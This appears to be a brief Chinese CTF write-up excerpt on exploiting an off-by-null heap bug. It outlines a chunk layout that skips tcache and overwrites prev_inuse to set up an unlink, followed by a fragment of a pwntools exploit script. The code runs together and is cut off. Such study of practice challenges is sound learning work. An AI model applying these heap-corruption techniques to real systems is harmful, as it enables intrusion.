首先程序有off-by-null,由于chunk的大小不小于0x400就不会被放入tache,就会直接进入unsorted bin,由于这个原因,在以前的一道题,遇到过一次这样的类型 我们可以先申请4个chunk,大小分别为0x410,0x68,0x4f0,第四个任意,首先delete掉第0个,然后对chunk1进行编辑覆盖0x4f0的位置pre_inuse位,并且把其pre_
context.arch ="amd64"libc = ELF('./bc.so.6')# sh = remote('node4.buuoj.cn',27589)a=sh.recvline() mmap_addr =int(a[-13:-1].decode('utf-8'),16)print(hex(mmap_addr))#construct unlinkforiinrange(7): alloc(0x80)foriinrange(7): delete(i) program_base = alloc(0x4F8) ...